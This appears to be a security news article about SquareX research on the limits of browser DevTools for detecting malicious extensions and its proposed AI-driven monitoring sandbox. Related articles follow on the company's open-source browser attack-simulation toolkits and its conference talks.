Browser DevTools' gaps leave millions exposed to threats
According to researchers at SquareX, browser extensions have become ubiquitous tools in both enterprise and consumer environments. However, organisations often rely on trust signals provided by browser extension stores, such as "Verified" or "Chrome Featured" badges, which may not provide genuine assurances about security. The Geco Colourpick case, where 18 malicious extensions distributed spyware to approximately 2.3 million users despite carrying verified statuses, was cited as an example.
SquareX security research has identified a key technological issue that complicates extension analysis. Nishant Sharma, Head of Security Research at SquareX, commented: "Aside from the fact that thousands of extension updates and submissions are being made daily, it is simply impossible for browser vendors to monitor and assess an extension's security posture at runtime. This is because existing DevTools were designed to inspect web pages. Extensions are complex beasts that can behave dynamically, work across multiple tabs and have 'superpowers' that allow them to easily bypass detection via rudimentary Browser DevTool telemetry."
Sharma added, "In other words, even if browser vendors were not inundated by the sheer quantity of extension submission requests, the architectural limitations of Browser DevTools today would still allow numerous malicious extensions to pass DevTool based security inspections."
Background to browser DevTools
The current generation of browser developer tools originated in the late 2000s. At that time, they were intended to assist developers and users in debugging websites and inspecting web page elements. Since then, browser extensions have evolved to offer unique capabilities, such as the ability to modify web pages, take screenshots, and inject scripts across multiple sites. These advanced functions cannot be readily tracked or attributed using today's DevTools.
For example, SquareX notes that when an extension injects a script into a page to execute a network request, existing DevTools cannot determine whether the request originated from the web page itself or from the extension. This lack of distinction makes the detection of malicious behaviour more difficult.
Proposed approach
To address these limitations, SquareX researchers have proposed an alternative framework. Detailed in a recent technical blog, the suggested approach combines a modified browser with AI-driven agents. The modified browser would be engineered to expose telemetry critical to understanding the behaviour of extensions. Meanwhile, the Browser AI Agent would simulate different user profiles to trigger various extension actions during runtime. This enables security teams to perform dynamic analysis and uncover behaviours only activated under certain user actions, timed events, or specific device environments.
This method is termed the Extension Monitoring Sandbox. According to SquareX, the necessary browser modifications and AI-driven simulation strategies outlined in their research are capable of uncovering "hidden" extension activities that would otherwise remain undetected by traditional developer tools.
Enterprise risk
SquareX suggests that this architectural gap in browser devtools has contributed to millions of users being exposed to threats. As browser extensions play an increasingly important role in enterprise operations, the company is urging security teams to go beyond reliance on labels or store badges when assessing risk. The revelation of Browser DevTools' architectural limitations exposes a fundamental security gap that has led to millions of users being compromised. As browser extensions become a core part of the enterprise workflow, it is critical for enterprises to move from superficial labels to solutions specifically designed to tackle extension security. It is absolutely critical for browser vendors, enterprises and security vendors to work closely together in tackling what has become one of the fastest emerging threat vectors.
Audit offering
SquareX is offering a complimentary enterprise-wide extension audit for organisations. The audit leverages all three components of the SquareX Extension Analysis Framework - metadata analysis, static code analysis, and dynamic analysis using the Extension Monitoring Sandbox. This process delivers a comprehensive review of all browser extensions in use across an organisation and provides a risk score for each.
The company cites reference material available through public security news sources regarding the prevalence and risk posed by malicious extensions. SquareX continues to promote the need for collaboration between browser vendors, security providers, and enterprises in addressing extension security challenges.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Techday NZ
2 days ago
- Techday NZ
SquareX launches open-source toolkits to defend browsers
SquareX has released two open-source toolkits to support security teams in simulating and defending against browser-based attacks that can evade traditional enterprise security measures. The two new toolkits, developed by SquareX security researchers, are designed to enable red and blue teams to more effectively address attack techniques that specifically target web browsers. These methods often exploit the fact that many conventional network and endpoint security solutions have limited visibility into threats that operate solely within the browser environment, such as session hijacking and data exfiltration. The prevalence of web browsers as the interface through which corporate resources are accessed and sensitive data is managed has elevated the browser as a key attack vector for threat actors. Despite this, most existing security frameworks continue to focus on more traditional points of compromise, like endpoints and networks. The toolkits aim to bridge this gap by providing practical resources for offensive (red teams) and defensive (blue teams) security teams. Red teams can leverage the tools to create simulations of browser-based attacks, while blue teams can use them to learn to detect and respond to threats that might be otherwise overlooked by standard monitoring systems. Angry Magpie toolkit One of the new toolkits, Angry Magpie, was developed by SquareX researchers Jeswin Mathai, Pankaj Sharma and Xian Xiang Chang. It focuses on simulating data exfiltration attacks using data splicing techniques that target weaknesses in data loss prevention (DLP) systems. Angry Magpie demonstrates how attackers can employ data sharding, ciphering, transcoding, and smuggling to bypass both proxy-based and endpoint DLP solutions. These attacks can be executed through everyday browser operations such as copying to clipboard, file uploads, downloads, and printing. This approach sheds light on how insider threats might launch data exfiltration campaigns from within a browser, offering security teams a means to recognise and counter similar techniques. The toolkit provides methods to reveal these vulnerabilities and can help teams develop targeted defences. Copycat toolkit The second toolkit, Copycat, was created by SquareX security researchers Dakshitaa Babu, Tejeswar S Reddy, Pankaj Sharma and Albin Antony. Copycat is designed to simulate identity and authentication attacks that are initiated through malicious or compromised browser extensions. The toolkit contains ten modules, each illustrating a distinct technique for carrying out identity compromise at the browser level, such as silent account hijacking, credential theft, two-factor authentication interception, and manipulation of OAuth flows. The toolkit demonstrates how even browser extensions with minimal permissions - such as widely-used colour picker extensions with tabs and scripting access - can be used by attackers to compromise user identities and gain control over authenticated sessions. Recent campaigns by threat actor groups like Scattered Spider and Muddled Libra have utilised similar browser-based techniques as an entry point into enterprises. "Enterprise security solutions are struggling to keep pace with modern attack techniques that operate entirely within web browsers. While organizations have invested heavily in endpoint detection and network security, these traditional defenses have limited visibility into browser-based threats - particularly identity attacks and data exfiltration that occur within authenticated sessions." The release of Angry Magpie and Copycat toolkits highlights the need for enhanced collective understanding and preparedness. They intend to give security professionals both concrete attack examples and the detection mechanisms necessary for enterprise environments. This effort is part of SquareX's broader strategy, which previously saw the introduction of a browser detection and response solution designed to deliver visibility and control within browser sessions. The company's security researchers emphasise that providing these tools to the wider community can help teams stay informed about the latest attack vectors and develop appropriate strategies in response. "Through these toolkits, SquareX extends its impact beyond pioneering the Browser Detection and Response solution to enabling the entire security industry - ensuring teams understand actively exploited attack techniques and can build appropriate defenses." The toolkits are open-source and available to security teams for direct use and adaptation in enterprise environments. Live demonstrations of Angry Magpie and Copycat are being held at DEF CON, offering a practical showcase of how the tools can be integrated into existing security frameworks.
Techday NZ
5 days ago
- Techday NZ
SquareX to unveil browser, passkey flaws at Black Hat, DEF CON
SquareX researchers are set to present a series of vulnerability disclosures relating to browser security at two major security events in August. During Black Hat USA and DEF CON 33, SquareX will reveal a number of architectural vulnerabilities impacting passkey authentication systems, enterprise data loss prevention solutions, and browser extensions. The company's researchers plan to deliver multiple talks that aim to detail new techniques attackers may use to circumvent existing security measures. Browser-first world At Black Hat USA, the presentation titled "Browser-Native Security in a Browser First World" will be delivered by Vivek Ramachandran, Founder of SquareX. This talk is expected to cover the growing dependency enterprises have on web browsers and the resulting security challenges. With staff reportedly spending up to 80% of their device usage time within browsers, defending against browser-based threats has become a critical concern. Ramachandran's talk will highlight current tactics, techniques, and procedures (TTPs) that enable attackers to bypass technologies such as Secure Access Service Edge (SASE), endpoint detection and response (EDR), and endpoint data loss prevention (DLP) tools. Passkey vulnerabilities DEF CON 33 will feature Shourya Pratap Singh, Jonathan Lin and Daniel Seetoh presenting research under the session title "Passkeys Pwned: Turning WebAuthn Against Itself." This discussion will focus on a new technique designed to subvert passkey authentication. Passkeys, which have seen significant uptake among major technology providers such as Apple, Google, and Microsoft, are promoted as a more secure alternative to traditional passwords. Despite this positioning, SquareX's research asserts that vulnerabilities still exist. "Over the past year, we have been releasing bleeding edge research on architectural browser vulnerabilities as part of the Year of Browser Bugs project. We believe that deeply understanding the attacker mindset is the only way to defend against the newest threat vectors, and we believe that it is critical to share these findings at industry leading conferences like Black Hat and DEF CON. This year's research demonstrates critical gaps that traditional security solutions simply cannot address - everything from passkey to browser extension vulnerabilities. We will also be sharing multiple open source browser-native security tools that enterprises need to plug the browser security gap," said Vivek Ramachandran, Founder of SquareX. Browser extension threats In addition to the mainstage talks, Nishant Sharma and Shourya Pratap Singh will present "Plug and Prey: Scanning and Scoring Browser Extensions" at Recon Village. Their session introduces ExtHuntr, an open-source tool developed to scan for installed browser extensions, analyse their permissions and behaviour, and generate risk scores. ExtHuntr aims to provide security teams with greater visibility into potential risks posed by browser extensions. SquareX will also run a demonstration called "Copycat: Identity Stealer Extension" and a session titled "Angry Magpie: DLP Bypass Simulator" at DEF CON 33 Demo Labs, underscoring the firm's focus on practical, real-world attack simulation tools related to browser security. Cloud security workshop Nishant Sharma, Head of Security Research at SquareX, is scheduled to conduct a workshop at Cloud Village, titled "Serverless but Not Defenceless: A Security Deep Dive into Cloud Run." The workshop will provide attendees with detailed guidance on how to deploy and manage services on Google Cloud Run securely, using principles drawn from DevSecOps and related practices. Security field manual Audrey Adeline, a SquareX researcher, will participate in "The Trailblazer's Guide to Cybersecurity" discussion at Black Hat USA. Topics will include the experiences of professionals who are first-generation entrants to the cybersecurity sector. Adeline will also share information about the release of The Browser Security Field Manual, a book written in collaboration with chief information security officers (CISOs) from Fortune 500 companies and major technology firms. The manual addresses contemporary attacks targeting employees via browsers and provides guidance on defensive techniques. Event schedule In addition to the headline talks, SquareX researchers will lead several demonstration sessions and workshops at both Black Hat USA and DEF CON 33. These include practical labs showing browser-based identity theft and DLP bypass scenarios, as well as further engagements focusing on serverless security and browser-native security tools. The presentations are designed to highlight what SquareX claims are critical gaps in existing security technology, particularly where traditional solutions may not adequately address emerging attack vectors related to browsers, passkeys, and extensions.
Techday NZ
29-07-2025
- Techday NZ
Browser DevTools' gaps leave millions exposed to threats
SquareX has highlighted architectural limitations in browser developer tools that hinder the effective debugging and analysis of potentially malicious browser extensions. According to researchers at SquareX, browser extensions have become ubiquitous tools in both enterprise and consumer environments. However, organisations often rely on trust signals provided by browser extension stores, such as "Verified" or "Chrome Featured" badges, which may not provide genuine assurances about security. The Geco Colourpick case, where 18 malicious extensions distributed spyware to approximately 2.3 million users despite carrying verified statuses, was cited as an example. SquareX security research has identified a key technological issue that complicates extension analysis. Nishant Sharma, Head of Security Research at SquareX, commented: "Aside from the fact that thousands of extension updates and submissions are being made daily, it is simply impossible for browser vendors to monitor and assess an extension's security posture at runtime. This is because existing DevTools were designed to inspect web pages. Extensions are complex beasts that can behave dynamically, work across multiple tabs and have 'superpowers' that allow them to easily bypass detection via rudimentary Browser DevTool telemetry." Sharma added, "In other words, even if browser vendors were not inundated by the sheer quantity of extension submission requests, the architectural limitations of Browser DevTools today would still allow numerous malicious extensions to pass DevTool based security inspections." Background to browser DevTools The current generation of browser developer tools originated in the late 2000s. At that time, they were intended to assist developers and users in debugging websites and inspecting web page elements. Since then, browser extensions have evolved to offer unique capabilities, such as the ability to modify web pages, take screenshots, and inject scripts across multiple sites. These advanced functions cannot be readily tracked or attributed using today's DevTools. For example, SquareX notes that when an extension injects a script into a page to execute a network request, existing DevTools cannot determine whether the request originated from the web page itself or from the extension. This lack of distinction makes the detection of malicious behaviour more difficult. Proposed approach To address these limitations, SquareX researchers have proposed an alternative framework. Detailed in a recent technical blog, the suggested approach combines a modified browser with AI-driven agents. The modified browser would be engineered to expose telemetry critical to understanding the behaviour of extensions. Meanwhile, the Browser AI Agent would simulate different user profiles to trigger various extension actions during runtime. This enables security teams to perform dynamic analysis and uncover behaviours only activated under certain user actions, timed events, or specific device environments. This method is termed the Extension Monitoring Sandbox. According to SquareX, the necessary browser modifications and AI-driven simulation strategies outlined in their research are capable of uncovering "hidden" extension activities that would otherwise remain undetected by traditional developer tools. Enterprise risk SquareX suggests that this architectural gap in browser devtools has contributed to millions of users being exposed to threats. As browser extensions play an increasingly important role in enterprise operations, the company is urging security teams to go beyond reliance on labels or store badges when assessing risk. The revelation of Browser DevTools' architectural limitations exposes a fundamental security gap that has led to millions of users being compromised. As browser extensions become a core part of the enterprise workflow, it is critical for enterprises to move from superficial labels to solutions specifically designed to tackle extension security. It is absolutely critical for browser vendors, enterprises and security vendors to work closely together in tackling what has become one of the fastest emerging threat vectors. Audit offering SquareX is offering a complimentary enterprise-wide extension audit for organisations. The audit leverages all three components of the SquareX Extension Analysis Framework - metadata analysis, static code analysis, and dynamic analysis using the Extension Monitoring Sandbox. This process delivers a comprehensive review of all browser extensions in use across an organisation and provides a risk score for each. The company cites reference material available through public security news sources regarding the prevalence and risk posed by malicious extensions. SquareX continues to promote the need for collaboration between browser vendors, security providers, and enterprises in addressing extension security challenges.
